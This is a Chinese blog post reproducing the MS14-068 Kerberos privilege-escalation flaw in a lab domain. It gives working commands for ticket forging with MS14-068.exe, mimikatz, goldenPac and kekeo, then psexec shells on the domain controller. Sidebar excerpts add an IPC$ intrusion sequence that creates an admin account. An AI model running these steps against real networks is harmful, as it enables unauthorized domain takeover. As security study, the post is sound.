MS14-068漏洞复现

最新推荐文章于 2024-08-07 19:00:57 发布
最新推荐文章于 2024-08-07 19:00:57 发布
阅读量5.2k 收藏 17
点赞数 1
分类专栏: 内网渗透 文章标签: MS14-068 域控
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/104139081
版权

0x01 简介

MS14-068漏洞可将普通域用户权限提升为域管理员用户,这个漏洞实战是碰到的可能性非常小了,但是如此经典的漏洞,不去玩一下,真的很不爽,于是搭建环境,复现一波。

0x02 漏洞复现

方法1:MS14-068工具利用

(https://github.com/ianxtianxt/MS14-068)
最开始想用一台win 2003作为域内机器攻击域控,可工具在03上各种问题,于是换了一台08的机器。
1、假定现在已经获取了域内的一台机器。首先查看当前用户是否为域用户。
net user zhangsan /domain
在这里插入图片描述
获取域控信息
net group “domain controllers” /domain
在这里插入图片描述
在这里插入图片描述

2、通过dir访问域控的共享文件夹,显示拒绝访问。
在这里插入图片描述

3、这里我们要用到“MS14-068”工具复现此漏洞,我们需要获取当前域机器的域用户名、密码、用户sid等信息。
获取用户sid:whoami /user
在这里插入图片描述

4、执行下列命令,会在当前目录生成一个ccache文件。
MS14-068.exe -u zhangsan@ggyao.com -p Aatesttest -s S-1-5-21-1572179255-3807128208-2620765154-1116 -d WIN-2008-DC.ggyao.com
在这里插入图片描述

5、删除当前域机器的票证:klist purge。
在这里插入图片描述

6、使用mimikatz将ccache文件导入,提升为域控权限。
kerberos::ptc TGT_zhangsan@ggyao.com.ccache
在这里插入图片描述

7、成功dir域控服务器C盘。
在这里插入图片描述

8、使用psexec.exe获取一个交互式shell。
psexec.exe \WIN-2008-DC.ggyao.com cmd
在这里插入图片描述

psexec执行单条命令:
psexec.exe \WIN-2008-DC.ggyao.com cmd /c “ipconfig”
在这里插入图片描述

方法2:goldenPac.exe(推荐使用)

(https://github.com/maaaaz/impacket-examples-windows)
此工具是impacket工具包里的,它是MS14-068+psexec的组合,因此使用起来非常放方便快捷。
goldenPac.exe ggyao.com/zhangsan:Aatesttest@WIN-2008-DC.ggyao.com
在这里插入图片描述

方法3:kekeo.exe

(https://github.com/gentilkiwi/kekeo/releases)
通过kekeo.exe获取域控权限,此工具并非每次都能成功利用。
kekeo.exe “exploit::ms14068 /domain:ggyao.com /user:zhangsan /password:Aatesttest /ptt” “exit”
在这里插入图片描述

LQxdp
关注
专栏目录
MS14-068 (CVE-2014-6324)域用户提权漏洞
做自己喜欢的事,并将其发挥到极致!
03-15 7623
文章目录声明一、漏洞简介二、漏洞原理三、实验环境四、漏洞利用利用思路前提条件方法一方法二方法三方法四五、参考文章 声明 本篇文章仅用于技术研究,切勿用于非法用途,仅供参考! 一、漏洞简介 远程权限提升漏洞存在于 Microsoft Windows 的 Kerberos KDC 实现中。存在该漏洞的情况为无法正确验证签名,这可能造成 Kerberos 服务票证的某些方面被人伪造。简单来说就是一个域内的普通账户可以利用此漏洞进行权限提升,升级为域管理员权限。 二、漏洞原理 Kerberos认证原理:http
iis6.0版本的解析漏洞复现
Alonegrief的博客
12-10 1162
这里复现iis6.0服务器的文件解析漏洞采用墨者学院的靶场,来进行复现 目录解析: 启动靶场,访问该地址,F12,查看他的头部信息,发现他是iis6.0版本的 既然是iis6.0版本的服务器,我们可以考虑iis6.0的两个漏洞: 1、 目录解析 2、 文件解析 先上传一个文件上去,观察url的变化 发现页面是一个asp页面,在电脑上面创建一个asp的一句话木马,然后用bp抓包修改数据包,在upload后面加入webshell.asp文件名,使服务器创建一个webshell.asp文件,这样子的目的是为了使
复现MS14-068
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
05-23 871
MS14-068
漏洞复现】常见框架漏洞复现 合集
最新发布
qq_48368964的博客
08-07 1347
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
linux经典漏洞复现,[漏洞复现] CVE-2017-11882 通杀所有office版本
weixin_29065659的博客
05-16 960
1、漏洞概述这几个月来,针对微软Office套件最火热最流行的***手段,莫过于基于CVE-2017-11882的漏洞利用。2017年11月14号,微软推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC***代码被逐渐公开。各路大神在Twitter和Github上相继公布自己的POC及对应的漏洞利用姿势,将这股烈火蔓延到201...
漏洞复现:DNS 缓存投毒的经典—— 2008年 kaminsky 漏洞
闵行小鱼塘
07-06 2626
最近研究DNS缓存投毒,那么经典的 kaminsky 漏洞自然是要尝试复现的。先用msf现成脚本,再根据理解自己写exp。巧合而又不幸的是:kaminsky大神陨落于2021.4.23,谨以此篇文章纪念大神传承遗志
最新系统漏洞--Microsoft Windows MSHTML Platform远程代码执行漏洞
weixin_48555088的博客
10-25 375
最新系统漏洞2021年10月25日 受影响系统: Microsoft Windows Server 2019 Microsoft Windows Server 2016 Microsoft Windows Server 2012 R2 Microsoft Windows Server 2012 Microsoft Windows Server 2008 R2 for x64-based S Microsoft Windows Server 2008 for x64-based Syst Microsoft
MS14-068 漏洞复现
box
03-24 944
0x00 漏洞成因 MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证 简单来说就是: windows域中使用kerberos协议过程中,为了让SS服务器判断Client是否有权限访问服务,引入了PAC机制。构造PAC也是这个漏洞的根本。 在请求AS时,
ms14-068利用工具包.zip
07-01
"minikataz"是一个提及的64位程序,很可能是一个轻量级的Kerberos模拟环境或测试工具,用于在安全环境中复现MS14-068漏洞。它可能帮助研究人员或安全专家在受控环境下理解漏洞的工作原理,测试修复措施,或者验证...
2002-2006年系统经典利用漏洞:ipc$
01-22
2002-2006年系统经典利用漏洞:ipc$ 2. 实例演示-完整入侵过程 (1)纯DOS命令式 入侵 首先构建一个入侵的环境,虚拟机之间能相互通信,即可表示为互联网环境,再扫描,得到有 漏洞的计算机IP net use \\192.168.38.129 /u:administrator ------------连接扫描到有漏洞大远程计算机(扫描远程电脑无密码)如果有密码 net use \\192.168.38.129 “” /u:administrator--- “”中要输入远程电脑的密码。 net use --------查看是否成功连接 net time \\192.168.38.129 ----查看对方电脑时间 at \\192.168.38.129 09:05 net user hnqdwxf2003 123 /add ---用at命令建立一个用户hnqdwxf2003密码123 at \\192.168.38.129 net localgroup administrators hnqdwxf2003 /add --提升为管理员权限 copy 拖进来\\192.168.38.129\c$ net time \\192.168.38.129 ----再次查看对方电脑时间 at \\192.168.38.129 时间 regedit /s c:\1.reg 或将对方电脑共享盘映射到本机 net use p:\\192.168.38.129 \c$ at \\192.168.38.129 时间 c:\1.bat 等待对方电脑重启,再连连接3389。 (2)利用开启telnet工具 (3)利用远控工具
[CVE-2017-12615]漏洞复现
https://www.cnblogs.com/zpchcbd/
05-07 2546
漏洞编号CVE-2017-12615 漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本 环境搭建 docker搭建 ubuntu16.04+docker sudo docker-compose up -d 手动搭建 tomcat7.0.0-7.0.81 环境 然后自己去配置当前目录下的/conf/web.xml 添加如下代码: readonly false 利用...
MS17-010漏洞
热门推荐
mylyylmy的博客
08-01 1万+
今天自己搭建了验证MS17-010漏洞的虚拟靶机(win7:10.112.109.4) 查看一下端口设置,发现打开了445端口并且关闭防火墙 用nmap扫描一下查找漏洞 445端口打开进入msfconsloe,查找相关的模块 第二个是扫描模块,第三个是漏洞利用模块 先用扫描模块看一下  use。。。,配置好选项后 运行 显示对于ms17-010脆弱,即我们可以开始利用,使用...
Ms2021-4034漏洞复现
qq_45908805的博客
11-17 370
近日,Qualys研究团队公开披露了在Polkit的pkexec 中发现的一个权限提升漏洞,也被称为PwnKit。该漏洞是由于pkexec 无法正确处理调用参数,从而将环境变量作为命令执行,任何非特权本地用户可通过此漏洞获取root权限。目前该漏洞PoC已公开。
MS14-068(域提权)漏洞复现
weixin_50985113的博客
06-29 802
这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。
MS08-067漏洞复现
一个未完成的故事
08-02 2997
漏洞简介: MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。(来自百度百科) 危害: 黑客可以利用该漏洞向网络中的电脑发出远程的特制RPC请求,无需身份验证便可在电脑中任意执行远程代码。这就是说,即便你的电脑设置了管理员密码,也只能任由黑客摆布。(
ms14-064漏洞复现停滞在Sending exploit
06-12
我理解你的问题是想要复现 MS14-064 漏洞,但是在发送 exploit 时遇到了问题,出现了停滞的情况。 首先,MS14-064 是一个由 Microsoft 发布的安全公告,涉及的漏洞编号为 CVE-2014-6324,它存在于 Windows Object Linking and Embedding (OLE) 中,攻击者可以利用该漏洞实现远程执行代码。 如果你想要复现漏洞,可以先找到一个受影响的 Windows 系统,并下载相应的漏洞利用工具。在发送 exploit 之前,你需要确保目标主机与攻击者主机之间能够正常通信,并且攻击者主机已经安装了相应的依赖库和工具。 如果出现了停滞的情况,可能是由于网络连接出现了问题,或是漏洞利用工具配置不正确等原因。你可以根据漏洞利用工具的日志信息来进行排查,或是参考相关的攻击教程进行调试。 需要注意的是,漏洞利用是一项高度危险的操作,建议在合法授权的情况下进行,并且不要在生产环境中进行测试。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值